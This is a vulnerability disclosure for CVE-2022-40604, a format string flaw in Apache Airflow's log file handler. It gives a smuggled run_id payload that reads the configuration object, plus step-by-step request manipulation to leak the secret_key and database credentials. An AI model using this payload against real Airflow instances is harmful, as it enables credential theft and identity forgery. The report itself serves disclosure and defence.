CVE-2022-40604: Apache Airflow: Format String Vulnerability

There is a Format String Vulnerability in src/airflow/utils/log/file_task_handler.py > url = os.path.join("http://{ti.hostname}:{worker_log_server_port}/log", log_relative_path).format( > ti=ti, worker_log_server_port=conf.get('logging', 'WORKER_LOG_SERVER_PORT') > ) In the above code, I can control some part of the `log_relative_path`, because `log_relative_path` is made up of `run_id` and other things. Attack steps: 1. Enter the DAGs menu, Choose any DAG, select `Trigger DAG w/ config`. 2. Set the run_id to `{ti.task.__class__.__init__.__globals__[conf].__dict__}` and trigger it. 3. Enter the `/xcom/list/` page, click to enter the corresponding task page. 4. Click the `Log` option and capture the packet, you will get a request similar to the following: `/get_logs_with_metadata?dag_id=example_xcom&task_id=push_by_returning&map_index=-1&execution_date=2022-08-29T13%3A25%3A11%2B00%3A00&try_number=1&metadata=null` 5. Modify `try_number` to a nonexistent value, such as 9999, such as: `/get_logs_with_metadata?dag_id=example_xcom&task_id=push_by_returning&map_index=-1&execution_date=2022-08-29T13%3A25%3A11%2B00%3A00&try_number=9999&metadata=null` 6. Paste the modified url into the browser for access ## Impact Attacker can get a lot of sensitive information through this vulnerability, such as `secret_key`, database connection string, various configurations. Can forge identity by the `secret_key`, can get the database password by database connection string, etc. Moreover, this vulnerability can be triggered by any DAG and exists in the production environment, so I think it's critical.